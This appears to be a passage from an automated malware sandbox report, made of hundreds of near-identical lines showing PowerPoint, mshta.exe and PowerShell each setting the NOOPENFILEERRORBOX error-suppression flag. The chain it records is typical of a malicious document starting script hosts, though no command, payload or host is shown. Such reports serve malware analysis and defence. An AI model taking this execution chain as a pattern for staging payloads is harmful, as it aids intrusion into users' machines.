Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
